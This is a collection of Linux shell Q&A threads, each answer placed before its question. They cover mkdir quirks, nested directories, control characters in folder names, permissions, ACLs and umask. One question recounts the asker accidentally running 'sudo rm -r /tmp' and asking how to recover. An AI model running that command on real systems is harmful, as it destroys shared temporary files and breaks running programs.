Sorry if this has an answer elsewhere, I've no idea how to search for my problem. I was running some simulations on a redhat linux HPC server, and my code for handling the folder structure to save the output had an unfortunate bug. My matlab code to create the folder was: folder = [sp.saveLocation, 'run_', sp.run_number, '/'];where sp.run_number was an integer. I forgot to convert it to a string, but for some reason running mkdir(folder); (in matlab) still succeeded. In fact, the simulations ran without a hitch, and the data got saved to the matching directory. Now, when the folder structure is queried/printed I get the following situations:When I try to tab autocomplete: run_ run_^A/ run_^B/ run_^C/ run_^D/ run_^E/ run_^F/ run_^G/ run_^H/ run_^I/ When I use ls: run_ run_? run_? run_? run_? run_? run_? run_? run_? run_? run_?. When I transfer to my mac using rsync the --progress option shows: run_\#003/ etc. with (I assume) the number matching the integer in sp.run_number padded to three digits, so the 10th run is run_\#010/ When I view the folders in finder I see run_ run_ run_ run_ run_ run_ run_ run_ run_ run_? Looking at this question and using the command ls | LC_ALL=C sed -n l I get: run_$ run_\001$ run_\002$ run_\003$ run_\004$ run_\005$ run_\006$ run_\a$ run_\b$ run_\t$ run_$I can't manage to cd into the folders using any of these representations. I have thousands of these folders, so I'll need to fix this with a script. Which of these options is the correct representation of the folder? How can I programmatically refer to these folders so I rename them with a properly formatted name using a bash script? And I guess for the sake of curiosity, how in the hell did this happen in the first place?
Why did my folder names end up like this, and how can I fix this using a script?
The limit will be the number of inodes on your partition since directories, like regular files, take an inode each. Nothing would stop you from creating a directory inside a directory inside another directory and so on until you run out of inodes. Note that the shell's command line does have a maximum length which can cause issues with really long paths, but it would still be possible to cd progressively towards the target file.
I'm curious, how many folders can be nested, and why? Is there a limit? What I mean by nested is when folders are in this structure: folder |_ folder |_ folder |_ folder |_ ...Not like this: folder |_ folder |_ folder |_ folder |_ ...If there is a limit, is it set by the operating system, or by the file system?
How many directories can be nested?
Try: for x in {a..z} ; do mkdir -p $x/${x}{a..z} ; doneBash will expand XXX{a..z} out to XXXa, XXXb, and so on. There's no need for the inner loop you have. After that: $ ls a b c d e f g h i j k l m n o p q r s t u v w x y z $ ls m ma mc me mg mi mk mm mo mq ms mu mw my mb md mf mh mj ml mn mp mr mt mv mx mz
I want to create a directory in such a way that I need to label the directories from a to z. Inside each of these directories, I need to create sub-directories so that they are labelled as aa, ab etc. So, for instance, for the directory m, my sub-directories will be labelled as ma, mb upto mz.
Recursively create directories for all letters
Try this, cd /source/dir/path find . -type d -exec mkdir -p -- /destination/directory/{} \;. -type d To list directories in the current path recursively. mkdir -p -- /destination/directory/{} create directory at destination. This relies on a find that supports expanding {} in the middle of an argument word.
I have a directory foo with subdirectories. I wish to create the same subdirectories names in another directory without copying their content. How do I do this? Is there a way to get ls output as a brace expansion list?
Create the same subfolders in another folder
/tmp can be considered as a typical directory in most cases. You can recreate it, give it to root (chown root:root /tmp) and set 1777 permissions on it so that everyone can use it (chmod 1777 /tmp). This operation will be even more important if your /tmp is on a separate partition (which makes it a mount point). By the way, since many programs rely on temporary files, I would recommend a reboot to ensure that all programs resume as usual. Even if most programs are designed to handle these situations properly, some may not.
Accidently, I ran sudo rm -r /tmp, is that a problem ? I recreated it using sudo mkdir /tmp, does that fix the problem ? After I recreated the directory, In the places section in the sidebar in nautilus in Ubuntu 14.04 I can see /tmp , which wasn't there before .. Is that a problem ? One last thing, do I have to run sudo chown $USER:$USER /tmp to make it accessible as it was before .. Would there be any side-effects after this ? By the way, I get this seemingly-related error whenI try to use bash autocompletionbash: cannot create temp file for here-document: Permission denied
Deleted /tmp accidently
The new folder is not created until you actually provide a name, normally by typing something in what looks like a directory/folder name in the currently open directory/folder in the manager. Once you enter that name and press return the actual call to mkdir() is executed (not the mkdir commandline command). And if you directly press Enter you often get some default name. The event that you press Ctrl+Shift+N triggers the routine that creates the box where you change the name for the new folder and that sets the whole thing rolling.
In many file managers there is a shortcut/key to create a new folder. In Nautilus, Thunar, Panthon-Files, this is Ctrl+Shift+N, in Dolphin it is F10. How does this shortcut work? I imagine that behind it it's a mkdir command, but that would need a path (like discussed here). I can imagine that opening the file manager at a certain location and using the shortcut, this triggers the needed command: is this what happens? What command is that? Can a custom shortcut be used for the same purpose?
How does 'Create New Folder' short-key work?
Keep in mind that there is more than one implementation of mv. The mv you use on linux is not from the exact same source as the one on OSX or Solaris, etc. But it is desirable for them all to behave in the same way -- this is the point of standards. It's conceivable that a mv implementation could add an option for this purpose, although since it is so simple to deal with, it would probably not be worthwhile because the very minor benefit is outwayed by a more significant negative consequence: Code written which exploited such a non-standard option of an implementation would not be portable to/behave constantly on another system using a standard implementation. mv is standardized by POSIX and this explicitly ties its behavior to the rename() system call. In ISO C the behavior of rename() is not very specific and much is left up to the implementation, but under POSIX you'll note the potential ENOENT error, indicating "a component of the path prefix of new does not exist", describing the behavior to be expected in explicit terms. This is better than ambiguity and leaving such details up to the implementation, because doing the latter hurts the portability. In defense of the design, in a scripting context it's probably better to by default fail on an invalid target path than assume it just needs to be created. This is because the path itself may often come from user input or configuration and may include a typo; in this case the script should fail at that point and indicate to the user that they've entered an invalid path. There is of course the option for the person who wrote the code to implement different behavior and create directories that don't exist, but it is better that you are responsible for doing that than the opposite (being responsible for ensuring a mv call won't create previously non-existent directories).
This question asks for the best way to create a directory when using mv if it doesn't exist. My question is why isn't this an inbuilt feature of mv? Is there some fundamental reason due to which this would not be a good idea?
Will `mv` ever have the ability to create directories?
t is not "temporary", it means that the sticky bit is set. From man ls:t [means that the] sticky bit is set (mode 1000), and is searchable or executable. (See chmod(1) or sticky(8).)The sticky bit is set here because you set decimal 777 (octal 1411), not octal 777 (decimal 511). You need to write 0777 to use octal, not 777. You should also note that the ultimate effect of the mode argument to mkdir also involves ANDing against your umask. From man 2 mkdir:The argument mode specifies the permissions to use. It is modified by the process's umask in the usual way: the permissions of the created directory are (mode & ~umask & 0777).I would suggest that if this affects you, you chmod after mkdir instead of using the mode argument. A final word of warning: mode 777 is almost never what you really want to do. Instead of opening up the directory globally to all users, consider setting a proper mode and owner/group on the directory. If you need more complicated rules, consider using ACLs.
I have a strange issue with directory permissions. From within a C++ app, I create a folder with: mkdir( "foldername", 777 ); But I got into an issue when attempting to create a file in that folder, fopen() returned NULL, and errno told me Permission denied. So I checked, and indeed, I had the following permissions on the folder that got created: dr----x--t (The root folder has drwxrwxr-x) I checked, and this unusual t means "temporary", but I have no clue on what that means. chmod 777 foldername from the shell does the job and sets attributes to drwxrwxrwx, but I can't do it manually each time. Question: any clue on what is going on ? Why doesn't my app correctly sets the folders attributes ? What is the meaning of this 'temporary' attribute ? (system is Ubuntu 12.04)
Issue on created folder permissions: temporary flag
AFAIK, there is nothing standard like that, but you can do it your self: ptouch() { for p do _dir="$(dirname -- "$p")" mkdir -p -- "$_dir" && touch -- "$p" done }Then you can do: ptouch /path/to/directory/file1 /path/to/directory/fil2 ...
I am aware of the fact that mkdir -p /path/to/new/directory will create a new directory, along with parent directory (if needed ). If I have to create a new file, along with it's parent directories (where some or all of the parent directories are not present), I could use mkdir -p /path/to/directory && touch /path/to/directory/NEWFILE. But, is there any other command to achieve this?
Make parent directories while creating a new file
The problem is that rsync is trying to create directories in a NTFS partition with illegal characters. From Naming ConventionsUse any character in the current code page for a name, including Unicode characters and characters in the extended character set (128–255), except for the following: The following reserved characters: > (less than) < (greater than) : (colon) " (double quote) / (forward slash) \ (backslash) | (vertical bar or pipe) ? (question mark) * (asterisk)AlsoDo not end a file or directory name with a space or a period. Although the underlying file system may support such names, the Windows shell and user interface does not. However, it is acceptable to specify a period as the first character of a name. For example, ".temp".Your failed directories have, or illegal characters or end with a period.
I tried to synchronize /dir1 (ext4) and /dir2 (ntfs) using rsync -azP, but got these errors: rsync: recv_generator: mkdir "dir2/X.Y." failed: Invalid argument (22)rsync: recv_generator: mkdir "dir2/CATSNDOGS\#123.11." failed: Invalid argument (22)Note that directories X.Y. and CATSNDOGS #123.11. are created by other party and, named as they are, downloaded (using Python script) to /dir1. I can't cd into these directories and ls -d doesn't list them. On the other hand, GUI-based nautilus shows both them and content inside them perfectly.
Synchronizing with rsync outputs error "Invalid argument (22)" for directories with dots and other symbols in their name
Talked to the infrastructure people, and the answer is that there are extended ACLs in place that act differently based on location, and that they were erroneously set.
Whenever I create new directories in my home (or its subdirectories) they do not have write permission, even though umask is set correctly. Files I make DO have write permission. [mmanary@seqap33 ~]$ umask 0002 [mmanary@seqap33 ~]$ mkdir testDir [mmanary@seqap33 ~]$ touch testFile [mmanary@seqap33 ~]$ ls -l dr-xr-x--- 2 mmanary mmanary 0 Apr 15 10:25 testDir -rw-rw-r-- 1 mmanary mmanary 0 Apr 15 10:26 testFileIf I switch to a shared group storage directory, then new directories DO have write permission. I can switch them with chmod easily, BUT when using tar, the new directory cannot be written in to so the tar fails with "Permission Denied". Any help is appreciated. Edit: I have read other suggested questions, but not seem to apply directly because they involve more complicated cases (other users involved). In case this helps: [mmanary@seqap33 ~]$ getfacl . # file: . # owner: mmanary # group: mmanary user::rwx group::r-x other::---Edit2: On advice from comments, my filesystem is NFS
mkdir permissions do not correspond to umask (change depending on location)
A wildcard always expands to existing names. Your command mkdir * fails because the names that * expands to already exists. Your command mkdir *.d "fails" because the *.d does not match any existing names. The pattern is therefore left unexpanded by default1 and a directory called *.d is created. You may remove this with rmdir '*.d'. To create a directory for each regular file in the current directory, so that the new directories have the same name as the files, but with a .d suffix: for name in ./*; do if [ -f "$name" ]; then # this is a regular file (or a symlink to one), create directory mkdir "$name.d" fi doneor, for people that like "one-liners", for n in ./*; do [ -f "$n" ] && mkdir "$n.d"; doneIn bash, you could also do names=( ./* ) mkdir "${names[@]/%/.d}"but this makes no checks for whether the things that the glob expands to are regular files or something else. The initial ./ in the commands above are to protect against filenames that contain an initial dash (-) in their filenames. The dash and the characters following it would otherwise be interpreted as options to mkdir.1 Some shells have a nullglob shell option that causes non-matched shell wildcards to be expanded to an empty string. In bash this is enabled using shopt -s nullglob.
I'm trying to make a directory for each file in a directory. mkdir *returns File exists. So I try mkdir *.dand it makes a directory called "*.d". How do I force the wildcard to expand?
Bash wildcard not expanding
With brace expansion. mkdir gallery{1..50}
In my scenario, I have some photos and I want to keep them separate. At present, I am doing mkdir gallery1 gallery2 gallery3 gallery4 gallery5 gallery6, but this is a pain. I think we can do it more easily. Suppose I want to make directories from gallery7 to gallery50. How would I do that?
How to create directory ranging from 1 to nth?
The echo always succeeds. Do without it and the subshell: #!/bin/bash echo "enter the directory name" read ab check(){ if mkdir "$ab" 2>/dev/null; then echo "directory created " ls -ld "$ab" exit else echo "try again " echo "enter new value for directory: " read ab check fi } check
I was trying to execute a program which will create a directory on the basis of a complete path provided to it from the prompt and, if the directory already exists it will return an error (for "directory already exists") and ask again for the name in a recursive function. Here it is what I tried: let us say a file, test1 in it: #!/bin/bash echo "enter the directory name" read ab check(){ if (( echo `mkdir $ab` 2>/dev/null )); then echo "directory created " echo `ls -ld $ab` exit else echo "try again " echo "enter new value for directory:" read ab check fi } checkThe problem here is if the directory exists then the program works fine but if it does not exist then it creates it but then goes to the else part of the program.
Executing a command within `if` statement and on success perform further steps
Group varies when creating subdir: drwxrwx---+ 28 admin sftponly 4.0K Oct 22 15:19 .. dr-xrwx---+ 2 admin *users* 4.0K Oct 22 22:41 subdirNested directory creation possibly restricted by the subdir's distinct group.
I am using sftp with the internal-sftp for debian. What I'm trying to acomplish is to jail all users to a specific folder which is working fine. I also need to have a single user that has "admin" rights on sftp but is not a root user. The admin user will be putting files in the sftp users directories, so they will be able to access them. The admin user will be a "non-technical" person using winscp or other client to do stuff. There is no way I can force him to use bash. I came up with the following solution:SFTP configurationUsing sshd_config I set up this: Match group users ChrootDirectory /home X11Forwarding no AllowTcpForwarding no ForceCommand internal-sftp -d %uMatch group sftponly ChrootDirectory /home X11Forwarding no AllowTcpForwarding no ForceCommand internal-sftp -d admin/sftp/%uSo my 'admin' user has all the sftp users in his home. 'admin' is also in the users group. all other users are created in the sftponly group. 'admin' is also in the sftponly group.Directory setupThe directory setup is as follows: -/ -home -admin -sftp -user1 -user2I created a script for creating the sftp users that perform the following:add user $U: useradd -d / -g 1000 -M -N -s /usr/sbin/nologin $Uset user $U password echo "$U:$P" | chpasswdcreate directory /home/admin/sftp/$U mkdir $SFTP_PATH/$Uset ownership chown $U:sftponly $SFTP_PATH/$Uset permissions chmod u=rx,go= -R $SFTP_PATH/$U chmod g+s $SFTP_PATH/$USetup ACL setfacl -Rm u:admin:rwx,u:$U:r-x,g::--- $SFTP_PATH/$U setfacl -d -Rm u:admin:rwx,u:$U:r-x,g::--- $SFTP_PATH/$USo far so good. Now what I wan't to have in point 6 is a setup that will allow the user admin to create a subdirectory in the $SFTP_PATH/$U that will be accessible to the $U itself. This works fine for the first directory created (user tester): # pwd /home/admin/sftp/tester # ls -alh dr-xrwx---+ 2 tester sftponly 4.0K Oct 22 16:06 tester # su admin $ cd /home/admin/sftp/tester $ mkdir subdir $ ls -alh admin@server:/home/admin/sftp/tester$ ls -alh total 20K dr-xrwx---+ 3 tester sftponly 4.0K Oct 22 22:41 . drwxrwx---+ 28 admin sftponly 4.0K Oct 22 15:19 .. dr-xrwx---+ 2 admin users 4.0K Oct 22 22:41 subdir $ cd subdir admin@storage:/home/admin/sftp/tester/subdir$ mkdir nesteddir mkdir: cannot create directory ‘nesteddir’: Permission deniedWhen I test the acl i get: admin@storage:/home/admin/sftp/tester$ getfacl subdir/ # file: subdir/ # owner: admin # group: users user::r-x user:admin:rwx user:tester:r-x group::--- mask::rwx other::--- default:user::r-x default:user:admin:rwx default:user:tester:r-x default:group::--- default:mask::rwx default:other::---So my question is: Being admin and having setfacl for admin as rwx, why can I create the directory subdir but cannot create the directory nested? Is there something I am missing here? I know of proftpd and pureftp but if possible I would like to use the ssh way. If there is no way to do this this way I would appreciate to point me in the right direction and recommend software that would be able to achieve this setup out of the box. Please note: user admin has his own directory under /home/admin/sharedfiles/, where he stores files that are then shared with the sftp users. The files are shared using hard links in their folders. For example if admin wants to share a file (the files are very big like 500GB) with 3 users he just puts hardlinks in their folders to those files and the can download them without having to copy the big files to the folder of each user. The issue occured when admin wanted to put different categories of shares in different folders fo the users. EDIT: I noticed that if I change the ownership of the newly created folder to 'tester' - then the creating of nested directories is possible for the admin user. However I still have to change the ownership of the nested directory to allow for further directory nesting. # chown tester:sftponly subdir # su admin $ cd /home/admin/sftp/tester/subdir $ mkdir nested # <----- works fine $ cd nested $ mkdir deepdir mkdir: cannot create directory ‘deepdir’: Permission deniedSo if I wanted to create the next nested directory then I have to chown tester:sftponly nested and then as user admin I can create the deepdir directory. Please note that the ACL is inherited and theoretically user admin has rwx permissions to all files and directories under the first folder, that is subdir. Maybe this will help in finding the reason for failing setfacl?
Why does default setfacl fail for nested directories?
The -f in your test is checking if FILE exists and is a regular file. What you need is -d to test if FILE exists and is a directory. if [ ! -d "$DIR/0folder" ] then mkdir "$DIR/0folder" fiIt is not mandatory to check if a directory exists though. According to the man page of mkdir we see the following man mkdir | grep -A1 -- -p -p, --parents no error if existing, make parent directories as neededHowever, if FILE exists and is a regular file mkdir -p will fail with mkdir: /Allfoldersgoeshere/subfolder/0folder': Not a directory. In this scenario handling the file that is expected to be a directory will be necessary before directory creation.
I have a folder which contains some folders, these folder are moved very often so I made a script to see if they exist, and if not then create them. This is what I did to (which I though would) achieve it: if [ ! -f "$DIR/0folder" ] then mkdir "$DIR/0folder" fiBut, even if 0folder already exists, it still tries to make it which mkdir tells me. Like here; mkdir: /Allfoldersgoeshere/subfolder/0folder: File existsWhy? It should just ignore it because it already exists?
Script tries to create files even though it shouldn't have to?
With zsh: dirs=(*(/)) mkdir -- $^dirs/doc touch -- $^dirs/doc/doc1.txt(/) is a globbing qualifier, / means to select only directories. $^array (reminiscent of rc's ^ operator) is to turn on a brace-like type of expansion on the array, so $^array/doc is like {elt1,elt2,elt3}/doc (where elt1, elt2, elt3 are the elements of the array). One could also do: mkdir -- *(/e:REPLY+=/doc:) touch -- */doc(/e:REPLY+=/doc1.txt:)Where e is another globbing qualifier that executes some given code on the file to select. With rc/es/akanga: dirs = */ mkdir -- $dirs^doc touch -- $dirs^doc/doc1.txtThat's using the ^ operator which is like an enhanced concatenation operator. rc doesn't support globbing qualifiers (which is a zsh-only feature). */ expands to all the directories and symlinks to directories, with / appended. With tcsh: set dirs = */ mkdir -- $dirs:gs:/:/doc::q touch -- $dirs:gs:/:/doc/doc1.txt::qThe :x are history modifiers that can also be applied to variable expansions. :gs is for global substitute. :q quotes the words to avoid problems with some characters. With zsh or bash: dirs=(*/) mkdir -- "${dirs[@]/%/doc}" touch -- "${dirs[@]/%/doc/doc1.txt}"${var/pattern/replace} is the substitute operator in Korn-like shells. With ${array[@]/pattern/replace}, it's applied to each element of the array. % there means at the end. Various considerations: dirs=(*/) includes directories and symlinks to directories (and there's no way to exclude symlinks other than using [ -L "$file" ] in a loop), while dir=(*(/)) (zsh extension) only includes directories (dir=(*(-/)) to include symlinks to directories without adding the trailing slash). They exclude hidden dirs. Each shell has specific option to include hidden files). If the current directory is writable by others, you potentially have security problems. As one could create a symlink there to cause you to create dirs or files where you would not want to. Even with solutions that don't consider symlinks, there's still a race condition as one may be able to replace a directory with a symlink in between the dirs=(*/) and the mkdir....
Suppose I have a directory /, and it contains many directories /mydir, /hisdir, /herdir, and each of those need to have a similar structure. For each directory in /, there needs to be a directory doc and within it a file doc1.txt. One might naively assume they could execute mkdir */doc touch */doc/doc1.txtbut they would be wrong, because wildcards don't work like that. Is there a way to do this without just making the structure once in an example then cping it to the others? And, if not, is there a way to do the above workaround without overwriting any existing files (suppose mydir already contains the structure with some data I want to keep)? EDIT: I'd also like to avoid using a script if possible.
Make many subdirectories at once
Add this to your .bashrc: mdcd() { mkdir "$@" && cd "$@" }Logout and login again or start a new shell to make the change.
Quite often I need to perform this two commands: mkdir abc cd abcI am curious whether there is a simple command (or an alias that I can create and use) to do it in one go, like user@GROUP:~$ mdcd abc user@GROUP:~/abc$Is this possible?
Command for creating a directory and navigating into it directly? [duplicate]
With GNU xargs: xargs -d '\n' mkdir -p -- < foo.txtxargs will run as few mkdir commands as possible. With standard syntax: (export LC_ALL=C sed 's/[[:blank:]"\'\'']/\\&/g' < foo.txt | xargs mkdir -p --)Where it's not efficient is that mkdir -p a/b/c will attempt some mkdir("a") and possibly stat("a") and chdir("a") and same for "a/b" even if "a/b" existed beforehand. If your foo.txt has: a a/b a/b/cin that order, that is, if for each path, there have been a line for each of the path components before, then you can omit the -p and it will be significantly more efficient. Or alternatively: perl -lne 'mkdir $_ or warn "$_: $!\n"' < foo.txtWhich avoids invoking a (many) mkdir command altogether.
I have a text file, "foo.txt", that specifies a directory in each line: data/bar/foo data/bar/foo/chum data/bar/chum/foo ...There could be millions of directories and subdirectories What is the quickest way to create all the directories in bulk, using a terminal command ? By quickest, I mean quickest to create all the directories. Since there are millions of directories there are many write operations. I am using ubuntu 12.04. EDIT: Keep in mind, the list may not fit in memory, since there are MILLIONS of lines, each representing a directory. EDIT: My file has 4.5 million lines, each representing a directory, composed of alphanumeric characters, the path separator "/" , and possibly "../" When I ran xargs -d '\n' mkdir -p < foo.txt after a while it kept printing errors until i did ctrl + c: mkdir: cannot create directory `../myData/data/a/m/e/d': No space left on device But running df -h gives the following output: Filesystem Size Used Avail Use% Mounted on /dev/xvda 48G 20G 28G 42% / devtmpfs 2.0G 4.0K 2.0G 1% /dev none 401M 164K 401M 1% /run none 5.0M 0 5.0M 0% /run/lock none 2.0G 0 2.0G 0% /run/shmfree -m total used free shared buffers cached Mem: 4002 3743 258 0 2870 13 -/+ buffers/cache: 859 3143 Swap: 255 26 229EDIT: df -i Filesystem Inodes IUsed IFree IUse% Mounted on /dev/xvda 2872640 1878464 994176 66% / devtmpfs 512053 1388 510665 1% /dev none 512347 775 511572 1% /run none 512347 1 512346 1% /run/lock none 512347 1 512346 1% /run/shmdf -T Filesystem Type 1K-blocks Used Available Use% Mounted on /dev/xvda ext4 49315312 11447636 37350680 24% / devtmpfs devtmpfs 2048212 4 2048208 1% /dev none tmpfs 409880 164 409716 1% /run none tmpfs 5120 0 5120 0% /run/lock none tmpfs 2049388 0 2049388 0% /run/shmEDIT: I increased the number of inodes, and reduced the depth of my directories, and it seemed to work. It took 2m16seconds this time round.
What is the fastest way to create a list of directories specified in a file?
As thrig pointed out, all that's needed is to create the directory structure that you want under /etc/skel. Quoting from the useradd man page-k, --skel SKEL_DIR The skeleton directory, which contains files and directories to be copied in the user's home directory, when the home directory is created by useradd. This option is only valid if the -m (or --create-home) option is specified. If this option is not set, the skeleton directory is defined by the SKEL variable in /etc/default/useradd or, by default, /etc/skel.... and the default SKEL variable in /etc/default/useradd is /etc/skel.
I want to add a few directories to the skeleton directory. When I add new user I want to add my own directories to the new home directories.
Skeleton directory - how to add my own directories
First of all, don't make your script read input at runtime. That is hard to use for your users since typos are inevitable and hard to fix, and also means the task cannot be easily repeated and automated. Instead, take the name and number as command line parameters. Next, it is bad coding style to use CAPS for local shell variable names since by convention, the global environment variables are capitalized and this can lead to unexpected naming collisions and hard to debug issues. Now, you real problem here is that you are using $((foo)) which means "treat foo as a mathematical expression and return its result". For example: $ echo $((4 + 3 )) 7Of course, the entire script doesn't really make sense either since you cannot create multiple files or directories with the same name. Perhaps you meant to add a counter? Maybe something like this: #!/bin/bashfolderName="$1" folderNumber="$2"for((i=1; i<=$folderNumber; i++)); do mkdir -p "$folderName"_$i doneWhich you execute like this: foo.sh bar 4And would result in: $ ls bar_1 bar_2 bar_3 bar_4If you want the first directory created not to have a suffix, you could do: #!/bin/bashfolderName="$1" folderNumber="$2"mkdir -p "$folderName" for((i=2; i<=$folderNumber; i++)); do mkdir -p "$folderName"_$i doneWhich results in: $ foo.sh bar 4 $ ls bar bar_2 bar_3 bar_4
The user will be asked 2 variables which will be the name of the folder and the number of folder they want to create. So if a user inputs sea and 3, the output should be: sea, sea2, sea3 read -p "Enter the name of the folder: " NAMEFOLDER read -p "How many copies of this folder do you want?: " NUMFOLDERi=0until [ $i -gt $NUMFOLDER ]do mkdir $(($NAMEFOLDER)) ((i=i+1)) donethen I am met with this problem "mkdir: cannot create directory ‘0’: File exists"I am stuck at this.
How to create folders using user input for the name and number
If you expressly list the directories, parent first, you can achieve your stated aim of creating the directories in one command: mkdir -m 555 -p a a/b a/b/cWith shells with support for csh-style brace expansion such as bash you can simplify this a little at the expense of readability: mkdir -m 555 -p a{,/b{,/c}}Notice, however, that for permissions 555 both commands will fail if it actually needs to create any of the parent directories: such directories are created with permissions that do not allow writing, and therefore next level directories cannot be created. Finally, a bash shell script that will also give you the functionality to create the multiple directories in one command as requested, by wrapping the complexity in a function. This one will attempt to apply the permissions to newly created directories from the bottom up, so it will be possible to end up with directories that have no write permission: mkdirs() { local dirs=() modes=() dir old # Grab arguments [[ "$1" == '-m' ]] && modes=('-m' "$2") && shift 2 dir=$1 # Identify missing directories while [[ "$dir" != "$old" ]] do [[ ! -d "$dir" ]] && dirs+=("$dir") old="$dir" dir="${dir%/*}" done # Create necessary directories and maybe fix up permissions for dir in "${dirs[@]}" do mkdir -p "${modes[@]}" "$dir" || return 1 [[ -n "${modes[1]}" ]] && chmod "${modes[1]}" "$dir" done }Example mkdirs -m 555 a/b/cls -ld a a/b a/b/c dr-xr-xr-x+ 1 roaima roaima 0 Jan 7 10:01 a dr-xr-xr-x+ 1 roaima roaima 0 Jan 7 10:01 a/b dr-xr-xr-x+ 1 roaima roaima 0 Jan 7 10:01 a/b/cAs always, this function can be put standalone into an executable script that's somewhere in your $PATH: #!/bin/bash mkdirs() { ...as above... }mkdirs "$@"
In Linux the following two commands work as expected: mkdir -m 555 new_directory mkdir -p a/b/cBut the following does not work as expected: mkdir -m 555 -p a/b/cthe 3 directories are created but only the latest recieves the 555 permission. The a and b directories have the default permissions. So how accomplish the goal described in the title? Is it possible? BTW - I selected 555 how a random case, it fails with 666 and 777 too
How create many nested directories and defining the permission to all them in one command?
Generally speaking, ${pkgs.nameOfPackage} is the preferred syntax. For your specific examplem mkdir is part of the coreutils package; which (pun intended) you can determine with the command readlink $(which mkdir). So your line should read: ExecStartPre=${pkgs.coreutils}/bin/mkdir BLAH BLAH BLAHWhile coreutils is always installed AFIK, a nice benefit of the ${pkgs.nameOfPackage} syntax is that you don't need to install the package nameOfPackage; Nix will pull it in for you.
I'm trying to write a systemd unit file. How do I specify the path to an executable? How can I determine what to use? In this specific case I'm trying to use mkdir. ExecStartPre = "/bin/mkdir -p %h/.config/example/pending/";This results in a error when starting the unit file though: Jan 16 08:46:11 nixos systemd[19577]: example.service: Failed at step EXEC spawning /bin/mkdir: No such file or directoryI suppose I could just use which to find the path to mkdir - but I'm seeing a ${pkgs.nameOfPackage} in other's nix's config - so possibly I should be using this instead? which mkdir /run/current-system/sw/bin/mkdir
How do I specify a path to an executable for a systemd unit file on nix?
cron doesn't run with the same environment as your user. It's likely having issues because it's not in the proper directory. Have your script cd to the directory containing the images before executing your for loop.
I am trying to organize my webcam picture files into folders otherwise I get thousands of pictures in one folder. I have a script foscam-move.sh (from Create sub-directories and organize files by date) with the following: #!/bin/bashfor x in *.jpg; do d=$(date -r "$x" +%Y-%m-%d) mkdir -p "$d" mv -- "$x" "$d/" doneI have the script located in the folder with all of the .jpg files. When I run it in terminal all is fine and it organizes it beautifully. When I add the following cron task it doesn't run. * * * * * /home/pi/Desktop/FI9821W_************/snap/foscam-move.sh # JOB_ID_2I have it set to run every minute because this camera takes a lot of pictures. How do I get cron to run my script every minute?
Sort files in a folder into dated folders
The macro AC_PROG_MKDIR_P is a feature test macro. It expands to shell code that tests for the best mkdir -p-capable command available. It uses MKDIR_P and ac_cv_path_mkdir (a "cache variable") to figure out what command to use. You may set the value of MKDIR_P to the command that you want to use for creating directories. The command that you use must be able to create not only a single directory but also the parent directories if these are not already existing (just like mkdir -p does). Normal: $ ./configure checking for a BSD-compatible install... /usr/bin/install -c checking whether build environment is sane... yes checking for a thread-safe mkdir -p... /usr/local/bin/gmkdir -p checking for gawk... gawk ...With MKDIR_P set: $ ./configure MKDIR_P='install -d -m 0755' checking for a BSD-compatible install... /usr/bin/install -c checking whether build environment is sane... yes checking for a thread-safe mkdir -p... install -d -m 0755 checking for gawk... gawk ...According to the documentation, one should be able to make this "permanent" by setting the cache variable ac_cv_path_mkdir to the wanted command. This variable can be set directly in the configure script (ugly) or by modifying the created config.cache file after running configure with the -C option once. However, I've found that configure adds a -p option to the value of this command which may not be wanted (the meaning of this option is different between mkdir and install). If you're happy with re-generating the configure script from its configure.ac source, you may set MKDIR_P to a value just after the call to AC_INIT. Then run autoconf (or autoreconf) to recreate configure. The most flexible way would be to set the MKDIR_P environment variable in the current shell session with export MKDIR_P='install -d' (or whatever you need). This would not require modifying any files, but would affect all configure scripts that you run in that shell session.
When I run sudo make install on a compiled package from the GNU archive, it uses mkdir -p to create the destination directories. I'd prefer it to use mkdir -p -m 0755 or install -d -m 0755 instead in order to ensure the destination directory has proper permissions for everyone under all circumstances, not just when the umask for root is 0022 (which isn't true for me). The package is using autoconf/automake and it looks like the behaviour is controlled by an M4 macro called AC_PROG_MKDIR_P. At the moment I can run sudo chmod 0755 on the directories I know have wrong permissions. But this isn't clearly the right option. I'd avoid to study the whole documentation in order to accomplish "just that". Any hint?
How to make autoconf use "install" instead of "mkdir -p"?
Use the command builtin to call an external command, bypassing any function of the same name. Also:What follows if is an ordinary command. To perform a string comparison, invoke the test built-in, or the [ builtin with the same syntax plus a final ], or the [[ …]] construct which has a more relaxed syntax. See using single or double bracket - bash for more information. The -eq operator is for comparing integers. Use = to compare strings. I added some limited support for passing multiple arguments (including options such as -p). Below I call cd only if mkdir succeeded, and I call it on the last argument passed to the function. -g will only be recognized as the very first argument. Parsing options to locate and remove it from whatever position it's in is possible, but harder.mkdir () { local do_cd= if [ "$1" = "-g"]; then do_cd=1 shift fi command mkdir "$@" && if [ -n "$do_cd" ]; then eval "cd \"\${$#}\"" fi }I don't recommend defining your custom options. They won't be shown in --help or man pages. They aren't more memorable than defining a command with a different name:either you don't remember that you have them, and there's no advantage compared to a command with a different name, or you don't remember that they're custom, and then you can find this out immediately with a custom name by asking the shell whether it's a built-in command or function (type mkcd), which is not the case with a custom option. There are use cases for overriding a standard command, but this is not one.
I have created lots of directories and I would to make my life lazy and to auto cd into the directory that I made with the option of -g with the result of mkdir -g foo The terminal would be like this: User:/$ mkdir -g foo User:/foo/$ I have looked at this page but with no success. Is there a one-liner that allows me to create a directory and move into it at the same time? I have tried in my .bash_profile with this command, but it just overrides the command entirely. (and realizing that it is an infinite loop later) mkdir() { if "$1" -eq "-g" mkdir "$2" cd "$2" else ## do the regular code fi }The other thing is that I don't want to make more aliases because I will eventually forget all of the aliases that I have. So not I don't want this: the command entirely. (and realizing that it is an infinite loop later) mkcd() { if "$1" -eq "-g" mkdir "$2" cd "$2" else ## do the regular code fi }I know that I most likely don't have the option thingy right, please correct me on that, but any help would be awesome!
how to add a custom option to the mkdir command
Read the lines one by one and use proper quoting: while IFS= read -r name; do mkdir -- "$name"; done <x.txt
I'm cating a file, and the output is something like this: Help me my friend Temptation Sorrow True Love Vanilla Sky I was here SOS ...I'm trying to create directory of all of these lines. What I have tried is: mkdir `cat x.txt`But the result is a mess! For instance, I was here will be split into three directories like I, was, and here. How can I fix this?? Thanks in advance.
Create directories from lines of a file [duplicate]
Change the |s in your command to ,: mkdir {Single,Multi}Lane_{Single,Dual}Carriageway_{USA,Europe}3.5.1 Brace Expansion
